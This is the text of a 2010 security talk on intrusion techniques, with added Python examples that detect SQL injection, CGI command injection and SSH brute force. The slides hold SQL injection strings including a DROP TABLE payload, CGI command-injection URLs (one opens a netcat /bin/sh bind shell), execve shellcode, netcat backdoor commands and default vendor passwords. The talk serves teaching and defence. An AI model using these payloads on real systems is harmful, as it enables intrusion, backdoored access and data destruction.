Intrusion Techniques

Ewerson Guimarães (Crash), Rener Silva (Gr1nch)

DcLabs Hacking Tour 2010


Description

Several attack techniques will be demonstrated, such as code injection, brute force, backdoors, rootkits, exploits and various other ways to gain and illegitimately keep access to servers; in counterpart, best practices for avoiding the types of attack mentioned are discussed. (Talk given at the 3rd Free Software Festival in Belo Horizonte - FSLBH)



Agenda

• FingerPrint

• Web-Bugs

• Backdoors

• Brute Force

• ShellCode

• Exploits

• Sniffers

• Scanners/Fuzzers

• MetaSploit

• IIS SemiColon

• Man-in-the-Middle

FingerPrint

The best tool for discovering operating systems, services, devices and more: NMAP (Network Mapper)

Basic commands:

nmap host          (basic scan)
nmap -sV host      (service versions)
nmap -P0 host      (ignore ICMP echo-reply, i.e. skip host discovery)
nmap -O host       (try to detect the O.S. version)
nmap -f host       (fragment packets: firewall/IDS/IPS evasion)

Fingerprinting grabs information about a target host. Ex: it is used to identify the operating system and/or service (daemon) version numbers from the unique characteristics of the host's TCP/IP responses.

Passive - FingerPrint

• TTL - the Time To Live value the operating system sets on outbound packets

• Window Size - the TCP window size the operating system sets

• DF - whether the operating system sets the Don't Fragment bit

• TOS - whether the operating system sets the Type of Service field, and if so, to what value
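The four fields above are enough to build a small passive fingerprinter. The following is an added example, not code from the slides: it rounds the observed TTL up to the nearest common initial value (32/64/128/255), estimates the hop count from the difference, and looks the tuple up in a signature table. The signature values and the captured packets are constructed for the example; real tools such as p0f and nmap carry far larger databases.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    """The four slide fields as read from one captured SYN (constructed input)."""
    ttl: int
    window: int
    df: bool
    tos: int


# Common initial TTL values; an observed TTL is rounded up to the nearest one.
INITIAL_TTLS = (32, 64, 128, 255)

# Assumed, illustrative signatures keyed on (initial TTL, window, DF, TOS).
SIGNATURES = {
    (64, 5840, True, 0): "Linux 2.6-era (assumed)",
    (64, 65535, True, 0): "FreeBSD/macOS-like (assumed)",
    (128, 65535, True, 0): "Windows XP-era (assumed)",
    (128, 8192, True, 0): "Windows 7-era (assumed)",
    (255, 8760, True, 0): "Solaris-like (assumed)",
}

# Coarse fallback when only the TTL family matches.
TTL_ONLY = {
    32: "Windows 9x-era (TTL only)",
    64: "Unix-like (TTL only)",
    128: "Windows (TTL only)",
    255: "Solaris/network device (TTL only)",
}


def initial_ttl(observed: int) -> int:
    """Round an observed TTL up to the initial value the sender most likely used."""
    for candidate in INITIAL_TTLS:
        if observed <= candidate:
            return candidate
    return 255  # not reachable for a valid 8-bit TTL; kept for safety


def hops(observed: int) -> int:
    """Estimated number of routers between us and the sender."""
    return initial_ttl(observed) - observed


def guess_os(pkt: Packet) -> str:
    """Exact signature match first, then fall back to the TTL family alone."""
    key = (initial_ttl(pkt.ttl), pkt.window, pkt.df, pkt.tos)
    return SIGNATURES.get(key, TTL_ONLY[key[0]])


def fingerprint_capture(packets: dict) -> dict:
    """Map source IP -> (OS guess, estimated hops) for a batch of packets."""
    return {ip: (guess_os(p), hops(p.ttl)) for ip, p in packets.items()}


# Constructed sample: three hosts seen on a LAN segment.
SAMPLE = {
    "10.0.0.11": Packet(ttl=64, window=5840, df=True, tos=0),
    "10.0.0.12": Packet(ttl=125, window=8192, df=True, tos=0),
    "192.168.5.3": Packet(ttl=240, window=4096, df=False, tos=0),
}

if __name__ == "__main__":
    for ip, (os_guess, h) in fingerprint_capture(SAMPLE).items():
        print(f"{ip:14} {os_guess:34} ~{h} hops")
```

Because the table is keyed on the rounded initial TTL, the same host is classified identically whether it is one hop or fifteen hops away; only the hop estimate changes.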

FingerPrint

Matrix: (slide image of per-OS fingerprint values, not reproduced in the text)

Web Vulnerability

• SQL-Injection

• Cross Site Scripting (XSS)

• Cross Site Request Forgery (CSRF)

• CGI Command Injection

• PHP-Injection

These vulnerabilities are initially exploited through malicious browser requests, compromising the target in a matter of minutes.

Web Vulnerability

SQL-Injection

It occurs when the attacker can insert a series of SQL statements into a query by manipulating the data the application accepts as input.

SELECT campos FROM tabela WHERE campo = '[email protected]';

Injected string: some' OR 'x'='x

Resulting query: SELECT fields FROM table WHERE field = 'some' OR 'x'='x';

Classic injection strings:

admin'--
" or 0=0 #
' or 1=1--
hi' or 'a'='a
' or 0=0 --
or 0=0 #
" or 1=1--
hi') or ('a'='a
" or 0=0 --
' or 'x'='x
or 1=1--
hi") or ("a"="a
or 0=0 --
" or "x"="x
' or a=a--
');Drop table x;--
' or 0=0 #
') or ('x'='x
hi" or 1=1 --
') or ('a'='a

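The following added example (not code from the slides) shows the mechanism behind the injected string above and the standard fix. A login check built by string concatenation is run against the slides' own some' OR 'x'='x and ' or 1=1-- strings using an in-memory SQLite database, then the same inputs are run through a parameterized query, where the driver passes the values out of band and quotes and comment sequences remain plain data. The users table and its single row are constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with one constructed user row.

    Plaintext passwords are used only to keep the demo short; a real
    application stores a salted password hash.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 's3cret')")
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """String concatenation: user input becomes part of the SQL grammar."""
    return (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Returns True whenever the concatenated query yields any row."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized query: the same inputs can no longer change the query's shape."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    attempts = [
        ("alice", "s3cret"),            # legitimate credentials
        ("nobody", "some' OR 'x'='x"),  # slide's injected string, in the password field
        ("' or 1=1--", "wrong"),        # comment sequence drops the password check
    ]
    for user, pw in attempts:
        print(f"{user!r:16} vulnerable={vulnerable_login(db, user, pw)!s:5} "
              f"safe={safe_login(db, user, pw)}")
        print("   query:", build_vulnerable_query(user, pw))
```

With ' or 1=1-- as the username the concatenated query becomes WHERE username = '' or 1=1--' AND password = 'wrong': everything after -- is a comment, so the password clause never runs. The parameterized version returns no row for either injected input.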

Web Vulnerability

CGI Command Injection

It occurs when the attacker inserts a series of shell commands through a vulnerable CGI script that passes user input to the system shell.

Nagios: https://www.xxx.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH

DD-WRT: http://www.xxx.com/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

Linksys: –Wireless/setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
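All three requests above share one trait: a shell metacharacter (;, or $IFS standing in for a space) arrives inside a CGI parameter or the path itself, often URL-encoded (%3B). The following added example, not code from the slides, scans Apache-style access-log lines for that trait. It URL-decodes the path and every query value before matching, because a detector that looks at the raw request would miss %3B. The log lines are constructed for the example and reuse the request shapes shown above with private addresses.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines; the first two mirror the request
# shapes on the slides, the last two are benign traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2010:12:00:01 -0300] "GET /nagios/cgi-bin/statuswml.cgi?ping=10.0.0.1%3Becho+%24PATH HTTP/1.1" 200 512
10.0.0.5 - - [10/Mar/2010:12:00:02 -0300] "GET /cgi-bin/;nc$IFS-l$IFS-p$IFS5555$IFS-e$IFS/bin/sh HTTP/1.1" 404 120
10.0.0.9 - - [10/Mar/2010:12:00:03 -0300] "GET /nagios/cgi-bin/statuswml.cgi?ping=10.0.0.1 HTTP/1.1" 200 480
10.0.0.9 - - [10/Mar/2010:12:00:04 -0300] "GET /index.html HTTP/1.1" 200 1024
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Tokens that let a value escape a quoted argument into the shell.
SHELL_META = re.compile(r';|\||&&|`|\$\(|\$IFS|\n|\r')


def suspicious_parts(target: str) -> list:
    """Return (name, decoded value) pairs that carry shell metacharacters.

    The path is reported under the name '<path>' because the DD-WRT pattern
    injects into the path rather than into a query parameter.
    """
    parts = urlsplit(target)
    findings = []
    path = unquote(parts.path)
    if SHELL_META.search(path):
        findings.append(("<path>", path))
    # parse_qsl decodes %XX escapes and '+' so the match sees what the shell would.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if SHELL_META.search(value):
            findings.append((name, value))
    return findings


def scan_log(text: str) -> list:
    """Parse each line and collect one finding per suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        for name, value in suspicious_parts(m["target"]):
            hits.append({"ip": m["ip"], "status": m["status"],
                         "param": name, "value": value, "target": m["target"]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']:10} {hit['status']} {hit['param']!r}: {hit['value']!r}")
```

The status code is kept in each finding because a 200 on an injected ping parameter is a very different signal from a 404: the former means the script ran with the input.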

ShellCode Introduction

#include <stdio.h>
#include <unistd.h>   /* execve() */

int main(void)
{
    char *comando[2];       /* argv for the program being started */
    comando[0] = "/bin/sh";
    comando[1] = NULL;      /* argv must be NULL-terminated */
    execve(comando[0], comando, NULL);
    return 0;
}

/* The same execve("/bin/sh") as x86 machine code, ready to be placed in a buffer */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x0a\x31\xc0\x88\x46\x09\x89\x46\x0e\xb0\x0b\x89"
    "\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
    "\xdc\xff\xff\xff/bin/sh";

Exploits

Kinds of exploits:

Local: usually the objective of a local exploit is to elevate the user's privileges on the machine as close as possible to root (uid=0) or Administrator. They are written to exploit kernel bugs or suid binaries.

Remote: it works over a network connection and exploits the vulnerable target without any prior access to it.

Exploit sources:

www.securityfocus.com
www.milw0rm.com
www.secunia.com
www.exploit-db.com

0-days: usually an unpublished exploit for a newly found vulnerability. You can buy them! $$$$$

Backdoors/RootKits

Used to maintain access to the system.

We can use Netcat for this purpose:

nc -vv -l -p 5555
nc -vv -l -p 5555 -e /bin/bash
nc <ip> <port>

RootKits

The main purpose of a rootkit is to hide the attacker's presence by replacing vital system binaries on the target's system. Examples:

• Hide files (whose names match given strings)

• Run a command when a string matches

• Hide processes

• Hide open ports, and others.

Default/Weak passwords

Default passwords are set by the manufacturers/developers and were not changed after installation/configuration.

As supplied by the system vendor and meant to be changed at installation time (nobody does this shit).

Ex: 3Com switch: User: security / Pass: security

FireBird: User: sysdba / Pass: masterkey

Weak: passwords that are easily guessed or that follow a keyboard sequence. Ex: 123456, love, house's phone number, birthday, etc.

Brute Force

It consists in trying random combinations of characters, numbers and symbols, wordlists and/or string generators to crack a password. Ex:

John the Ripper
Hydra
SSH Brute Force

DirBuster - DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers.
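From the defender's side, an SSH brute-force attempt like the ones these tools produce shows up as a burst of "Failed password" lines from one source. The following added example (not code from the slides) parses constructed sshd syslog lines, groups failures per source IP, and uses a sliding window to find the peak number of failures in any 60-second span; a source whose peak reaches the threshold is flagged, and the set of usernames tried is reported so that password spraying (many users, few guesses each) is visible too. The log lines, host name and threshold are assumptions for the example; syslog lines carry no year, so one is supplied.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in syslog format (hostname "web1" is made up).
SAMPLE_AUTH_LOG = """\
Mar 10 12:00:01 web1 sshd[2101]: Failed password for root from 10.0.0.7 port 50210 ssh2
Mar 10 12:00:03 web1 sshd[2103]: Failed password for invalid user admin from 10.0.0.7 port 50211 ssh2
Mar 10 12:00:05 web1 sshd[2105]: Failed password for invalid user oracle from 10.0.0.7 port 50212 ssh2
Mar 10 12:00:08 web1 sshd[2107]: Failed password for root from 10.0.0.7 port 50213 ssh2
Mar 10 12:00:11 web1 sshd[2109]: Failed password for invalid user test from 10.0.0.7 port 50214 ssh2
Mar 10 12:00:14 web1 sshd[2111]: Failed password for root from 10.0.0.7 port 50215 ssh2
Mar 10 12:05:30 web1 sshd[2140]: Failed password for alice from 10.0.0.8 port 50300 ssh2
Mar 10 12:05:40 web1 sshd[2142]: Accepted password for alice from 10.0.0.8 port 50301 ssh2
"""

FAILED = re.compile(
    r'^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for '
    r'(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+'
)


def parse_failures(text: str, year: int = 2010) -> list:
    """Return (timestamp, source ip, username) for every failed login, oldest first."""
    events = []
    for line in text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue  # accepted logins and unrelated daemons are skipped
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"]))
    events.sort()
    return events


def detect_bruteforce(events: list, threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> dict:
    """Per source IP: peak failures inside any window, usernames tried, flag."""
    by_ip = defaultdict(list)
    for ts, ip, user in events:
        by_ip[ip].append((ts, user))
    report = {}
    for ip, items in by_ip.items():
        peak, start = 0, 0
        for end in range(len(items)):
            # Advance the window start until it lies within `window` of `end`.
            while items[end][0] - items[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        report[ip] = {
            "peak": peak,
            "users": sorted({user for _, user in items}),
            "flagged": peak >= threshold,
        }
    return report


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_failures(SAMPLE_AUTH_LOG)).items():
        mark = "BRUTE FORCE" if info["flagged"] else "ok"
        print(f"{ip:10} peak={info['peak']} users={info['users']} {mark}")
```

A single failure from 10.0.0.8 followed by an accepted login is normal user behaviour and stays unflagged; the six failures in thirteen seconds from 10.0.0.7, spread over four usernames, is the pattern a tool like Hydra leaves behind.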

Scanners/Fuzzers

There are 2 types of scanners: specific ones, written for a specific vulnerability (BSQLHacker, SQLMAP), and generic ones, written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate potential targets/vulnerabilities.

Examples (shown as screenshots in the slides):

Saint
W3af
Nexpose Community

Sniffers

A sniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and other cool info). Ex: Wireshark

DoS

Denial of Service consists of attempts to prevent valid users from using a particular service, or simply to take it down.

• SYN FLOOD

• UDP Packet Storm

• DDoS

• Smurf Attack

MetaSploit


IIS SemiColon

Secure it? Wtf?

Man-in-the-Middle

Hardening your server

HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system.

http://hntool.net

[email protected]

[email protected]

irc.freenode.net #dclabs #securityguys